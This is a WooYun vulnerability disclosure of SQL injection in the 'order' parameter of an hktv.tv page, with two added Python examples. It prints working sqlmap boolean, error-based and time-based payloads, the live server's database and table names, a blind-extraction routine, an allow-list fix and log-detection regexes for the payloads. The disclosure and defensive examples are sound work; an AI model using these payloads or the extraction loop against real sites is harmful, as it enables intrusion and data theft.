
Vulnerability summary

Defect ID: wooyun-2015-0135660

Title: SQL injection vulnerability in a 云视 (cdvcloud.com) site

Vendor: cdvcloud.com

Reporter: 路人甲

Submitted: 2015-08-20 17:28

Fixed: 2015-10-05 10:16

Published: 2015-10-05 10:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-20: Details sent to the vendor; awaiting vendor handling
2015-08-21: Vendor confirmed; details disclosed to the vendor only
2015-08-31: Details disclosed to core white hats and relevant domain experts
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to intern white hats
2015-10-05: Details disclosed to the public

Brief description:

As per title.

Detailed description:

http://www.hktv.tv/e/extend/say/p_index.php?classid=88&id=347&num=5&order=1&sub=60
Injectable parameter: order (GET)
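The report gives only the endpoint and the parameter name. The Python/sqlite3 script below is an added example, not code from the report, the site or the vendor. It reproduces the pattern the sqlmap output implies (the client-supplied order value is spliced into the SQL text; it is assumed here to land in an ORDER BY clause), shows how a boolean-based blind payload of the kind sqlmap used turns row order into a one-bit oracle that extracts arbitrary data, and contrasts it with an allow-list fix. The table and column names, the sample rows and the order-code mapping are all constructed for illustration; the MySQL-specific RLIKE trick is replaced by a portable CASE expression.

```python
import sqlite3

# Constructed stand-in for the site's content table (not data from the report).
# The table/column names, the sample rows and the ORDER mapping are assumptions.
ROWS = [(1, "alpha", 30), (2, "bravo", 10), (3, "charlie", 20)]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE say (id INTEGER PRIMARY KEY, title TEXT, score INTEGER)")
    conn.executemany("INSERT INTO say VALUES (?, ?, ?)", ROWS)
    return conn

def vulnerable_ids(conn, order):
    """The broken pattern: the client's 'order' value is spliced straight into the
    SQL text, so the database evaluates whatever expression it contains."""
    return [row[0] for row in conn.execute("SELECT id FROM say ORDER BY " + order)]

def blind_oracle(conn, condition):
    """Asks the database one yes/no question and reads the answer from row order:
    True sorts by id ([1, 2, 3]), False sorts by score (a different order). This
    is the portable equivalent of the report's RLIKE/CASE boolean-blind payload."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE score END)"
    return vulnerable_ids(conn, payload) == [1, 2, 3]

def blind_extract(conn, expr, max_len=16):
    """Recovers the string value of any SQL expression one character at a time,
    binary-searching each code point through the oracle (about 7 requests per
    character); this is what 'boolean-based blind' buys an attacker."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # coalesce(..., 0) turns the NULL past the end of the string into 0
            cond = f"coalesce(unicode(substr(({expr}), {pos}, 1)), 0) > {mid}"
            if blind_oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # end of string
        out += chr(lo)
    return out

# Assumed mapping from the numeric order code the page accepts to a fixed clause.
ALLOWED_ORDER = {"1": "id ASC", "2": "id DESC", "3": "score DESC"}

def safe_ids(conn, order):
    """The fix: ORDER BY cannot take a bound parameter, so the client value is only
    ever used as a key into a server-side allow-list; anything else is rejected."""
    clause = ALLOWED_ORDER.get(order)
    if clause is None:
        raise ValueError(f"unsupported order value: {order!r}")
    return [row[0] for row in conn.execute("SELECT id FROM say ORDER BY " + clause)]

if __name__ == "__main__":
    db = make_db()
    print(blind_extract(db, "(SELECT title FROM say WHERE id = 2)"))  # bravo
    print(safe_ids(db, "3"))                                           # [1, 3, 2]
    try:
        safe_ids(db, "1 AND (SELECT 1)")
    except ValueError as exc:
        print("rejected:", exc)
```

The point of the allow-list is that a sort column or direction is an identifier, not a value, so prepared statements alone cannot fix this endpoint; the same applies to any of the `num`, `classid` or `sub` parameters if they are ever used as anything other than bound values.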

Proof of vulnerability:

Parameter: order (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: classid=88&id=347&num=5&order=1 RLIKE (SELECT (CASE WHEN (5751=5751) THEN 1 ELSE 0x28 END))&sub=60
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: classid=88&id=347&num=5&order=1 AND (SELECT 2695 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(2695=2695,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sub=60
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: classid=88&id=347&num=5&order=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FfrU)&sub=60
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
current user: 'bjxaty@10.122.76.132:52156'
current user is DBA: False
available databases [24]:
[*] bbs_hktv
[*] cdp
[*] cms_as
[*] cms_hktv
[*] information_schema
[*] jsbc-security
[*] meicam
[*] mysql
[*] odp
[*] onairfastedit
[*] onairtranscode
[*] ors
[*] performance_schema
[*] security_as
[*] security_hktv
[*] security_hn
[*] vms
[*] vms_as
[*] vms_hktv
[*] vms_jyg
[*] vms_sjs
[*] wechat_hn
[*] wechat_sjs
[*] yicloud_aliyun_rds_dummy_database
Database: cms_hktv
[238 tables]
+------------------------------+
| hks_ecms_article |
| hks_ecms_article_check |
| hks_ecms_article_check_data |
| hks_ecms_article_data_1 |
| hks_ecms_article_doc |
| hks_ecms_article_doc_data |
| hks_ecms_article_doc_index |
| hks_ecms_article_index |
| hks_ecms_download |
| hks_ecms_download_check |
| hks_ecms_download_check_data |
| hks_ecms_download_data_1 |
| hks_ecms_download_doc |
| hks_ecms_download_doc_data |
| hks_ecms_download_doc_index |
| hks_ecms_download_index |
| hks_ecms_flash |
| hks_ecms_flash_check |
| hks_ecms_flash_check_data |
| hks_ecms_flash_data_1 |
| hks_ecms_flash_doc |
| hks_ecms_flash_doc_data |
| hks_ecms_flash_doc_index |
| hks_ecms_flash_index |
| hks_ecms_info |
| hks_ecms_info_check |
| hks_ecms_info_check_data |
| hks_ecms_info_data_1 |
| hks_ecms_info_doc |
| hks_ecms_info_doc_data |
| hks_ecms_info_doc_index |
| hks_ecms_info_index |
| hks_ecms_infoclass_article |
| hks_ecms_infoclass_download |
| hks_ecms_infoclass_flash |
| hks_ecms_infoclass_info |
| hks_ecms_infoclass_movie |
| hks_ecms_infoclass_news |
| hks_ecms_infoclass_photo |
| hks_ecms_infoclass_shop |
| hks_ecms_infotmp_article |
| hks_ecms_infotmp_download |
| hks_ecms_infotmp_flash |
| hks_ecms_infotmp_info |
| hks_ecms_infotmp_movie |
| hks_ecms_infotmp_news |
| hks_ecms_infotmp_photo |
| hks_ecms_infotmp_shop |
| hks_ecms_movie |
| hks_ecms_movie_check |
| hks_ecms_movie_check_data |
| hks_ecms_movie_data_1 |
| hks_ecms_movie_doc |
| hks_ecms_movie_doc_data |
| hks_ecms_movie_doc_index |
| hks_ecms_movie_index |
| hks_ecms_news |
| hks_ecms_news_check |
| hks_ecms_news_check_data |
| hks_ecms_news_data_1 |
| hks_ecms_news_doc |
| hks_ecms_news_doc_data |
| hks_ecms_news_doc_index |
| hks_ecms_news_index |
| hks_ecms_photo |
| hks_ecms_photo_check |
| hks_ecms_photo_check_data |
| hks_ecms_photo_data_1 |
| hks_ecms_photo_doc |
| hks_ecms_photo_doc_data |
| hks_ecms_photo_doc_index |
| hks_ecms_photo_index |
| hks_ecms_shop |
| hks_ecms_shop_check |
| hks_ecms_shop_check_data |
| hks_ecms_shop_data_1 |
| hks_ecms_shop_doc |
| hks_ecms_shop_doc_data |
| hks_ecms_shop_doc_index |
| hks_ecms_shop_index |
| hks_enewsad |
| hks_enewsadclass |
| hks_enewsadminstyle |
| hks_enewsbefrom |
| hks_enewsbq |
| hks_enewsbqclass |
| hks_enewsbqtemp |
| hks_enewsbqtempclass |
| hks_enewsbuybak |
| hks_enewsbuygroup |
| hks_enewscard |
| hks_enewsclass |
| hks_enewsclass_stats |
| hks_enewsclass_stats_ip |
| hks_enewsclass_stats_set |
| hks_enewsclassadd |
| hks_enewsclassf |
| hks_enewsclassnavcache |
| hks_enewsclasstemp |
| hks_enewsclasstempclass |
| hks_enewsdiggips |
| hks_enewsdo |
| hks_enewsdolog |
| hks_enewsdownerror |
| hks_enewsdownrecord |
| hks_enewsdownurlqz |
| hks_enewserrorclass |
| hks_enewsf |
| hks_enewsfava |
| hks_enewsfavaclass |
| hks_enewsfeedback |
| hks_enewsfeedbackclass |
| hks_enewsfeedbackf |
| hks_enewsfile_1 |
| hks_enewsfile_member |
| hks_enewsfile_other |
| hks_enewsfile_public |
| hks_enewsgbook |
| hks_enewsgbookclass |
| hks_enewsgfenip |
| hks_enewsgroup |
| hks_enewshmsg |
| hks_enewshnotice |
| hks_enewshy |
| hks_enewshyclass |
| hks_enewsindexpage |
| hks_enewsinfoclass |
| hks_enewsinfotype |
| hks_enewsinfovote |
| hks_enewsjstemp |
| hks_enewsjstempclass |
| hks_enewskey |
| hks_enewskeyclass |
| hks_enewslink |
| hks_enewslinkclass |
| hks_enewslinktmp |
| hks_enewslisttemp |
| hks_enewslisttempclass |
| hks_enewslog |
| hks_enewsloginfail |
| hks_enewsmember |
| hks_enewsmember_connect |
| hks_enewsmember_connect_app |
| hks_enewsmemberadd |
| hks_enewsmemberf |
| hks_enewsmemberfeedback |
| hks_enewsmemberform |
| hks_enewsmembergbook |
| hks_enewsmembergroup |
| hks_enewsmemberpub |
| hks_enewsmenu |
| hks_enewsmenuclass |
| hks_enewsmod |
| hks_enewsnewstemp |
| hks_enewsnewstempclass |
| hks_enewsnotcj |
| hks_enewsnotice |
| hks_enewspage |
| hks_enewspageclass |
| hks_enewspagetemp |
| hks_enewspayapi |
| hks_enewspayrecord |
| hks_enewspic |
| hks_enewspicclass |
| hks_enewspl_1 |
| hks_enewspl_set |
| hks_enewsplayer |
| hks_enewsplf |
| hks_enewspltemp |
| hks_enewspostdata |
| hks_enewspostserver |
| hks_enewsprinttemp |
| hks_enewspublic |
| hks_enewspublic_update |
| hks_enewspubtemp |
| hks_enewspubvar |
| hks_enewspubvarclass |
| hks_enewsqmsg |
| hks_enewssearch |
| hks_enewssearchall |
| hks_enewssearchall_load |
| hks_enewssearchtemp |
| hks_enewssearchtempclass |
| hks_enewsshop_address |
| hks_enewsshop_ddlog |
| hks_enewsshop_precode |
| hks_enewsshop_set |
| hks_enewsshopdd |
| hks_enewsshopdd_add |
| hks_enewsshoppayfs |
| hks_enewsshopps |
| hks_enewssp |
| hks_enewssp_1 |
| hks_enewssp_2 |
| hks_enewssp_3 |
| hks_enewssp_3_bak |
| hks_enewsspacestyle |
| hks_enewsspclass |
| hks_enewssql |
| hks_enewstable |
| hks_enewstags |
| hks_enewstagsclass |
| hks_enewstagsdata |
| hks_enewstask |
| hks_enewstempbak |
| hks_enewstempdt |
| hks_enewstempgroup |
| hks_enewstempvar |
| hks_enewstempvarclass |
| hks_enewstogzts |
| hks_enewsuser |
| hks_enewsuseradd |
| hks_enewsuserclass |
| hks_enewsuserjs |
| hks_enewsuserjsclass |
| hks_enewsuserlist |
| hks_enewsuserlistclass |
| hks_enewsuserloginck |
| hks_enewsvote |
| hks_enewsvotemod |
| hks_enewsvotetemp |
| hks_enewswapstyle |
| hks_enewswfinfo |
| hks_enewswfinfolog |
| hks_enewswords |
| hks_enewsworkflow |
| hks_enewsworkflowitem |
| hks_enewswriter |
| hks_enewsyh |
| hks_enewszt |
| hks_enewsztadd |
| hks_enewsztclass |
| hks_enewsztf |
| hks_enewsztinfo |
| hks_enewszttype |
| hks_enewszttypeadd |
| hks_tv |
| hks_tv_playlist |
+------------------------------+
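Each of the three payload families in the sqlmap output above leaves a recognisable trace in the web server's access log. The Python script below is an added example, not code from the report or the vendor: it scans constructed Apache-style access-log lines, URL-decodes every query parameter and flags the sqlmap signatures visible in this proof (RLIKE, FLOOR(RAND(0)*2) together with INFORMATION_SCHEMA, and SLEEP()), then groups hits by client IP and parameter. The log lines are constructed to mirror the report's payloads; the client IPs, timestamps and response sizes are made up.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache-style access-log lines (not from the report). Lines 2-4 carry
# the report's three sqlmap payloads, URL-encoded as sqlmap would send them;
# lines 1 and 5 are ordinary requests to the same endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2015:17:20:01 +0800] "GET /e/extend/say/p_index.php?classid=88&id=347&num=5&order=1&sub=60 HTTP/1.1" 200 4213
10.0.0.5 - - [20/Aug/2015:17:20:02 +0800] "GET /e/extend/say/p_index.php?classid=88&id=347&num=5&order=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%285751%3D5751%29%20THEN%201%20ELSE%200x28%20END%29%29&sub=60 HTTP/1.1" 200 4213
10.0.0.5 - - [20/Aug/2015:17:20:03 +0800] "GET /e/extend/say/p_index.php?classid=88&id=347&num=5&order=1%20AND%20%28SELECT%202695%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716b6b7a71%2C%28SELECT%20%28ELT%282695%3D2695%2C1%29%29%29%2C0x7176706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&sub=60 HTTP/1.1" 500 0
10.0.0.5 - - [20/Aug/2015:17:20:09 +0800] "GET /e/extend/say/p_index.php?classid=88&id=347&num=5&order=1%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29FfrU%29&sub=60 HTTP/1.1" 200 4213
10.0.0.9 - - [20/Aug/2015:17:21:00 +0800] "GET /e/extend/say/p_index.php?classid=88&id=347&num=5&order=2&sub=60 HTTP/1.1" 200 4213
"""

# One regex per payload family seen in the sqlmap output above.
SIGNATURES = {
    "mysql-rlike-boolean": re.compile(r"\bRLIKE\s*\(", re.I),
    "mysql-error-floor-rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information-schema-ref": re.compile(r"\bINFORMATION_SCHEMA\s*\.", re.I),
    "mysql-time-sleep": re.compile(r"\bSLEEP\s*\(\s*\d+", re.I),
}

# Apache combined/common log prefix: ip ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

def scan_line(line):
    """Returns one finding per (parameter, signature) match in a single log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes once; decoding again catches double-encoded
        # payloads at the cost of a few false positives on literal '%' data.
        decoded = unquote_plus(value)
        for sig, rx in SIGNATURES.items():
            if rx.search(decoded):
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                 "status": m["status"], "sig": sig})
    return findings

def scan_log(text):
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]

def summarize(findings):
    """Groups signatures by (client IP, parameter): several distinct families
    hitting one parameter from one source is the typical sqlmap footprint."""
    by_key = {}
    for f in findings:
        by_key.setdefault((f["ip"], f["param"]), set()).add(f["sig"])
    return {key: sorted(sigs) for key, sigs in by_key.items()}

if __name__ == "__main__":
    for key, sigs in summarize(scan_log(SAMPLE_LOG)).items():
        print(key, sigs)
```

A 500 on the error-based request, as in the constructed third line, is worth correlating separately: error-based injection only works when database errors reach the response, so that status pattern doubles as a hint that error display should be turned off on the endpoint.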

Fix suggestion:

None given.

Copyright notice: reproduction must credit 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-08-21 10:14

Vendor reply:

Fixed.

Latest status:

None.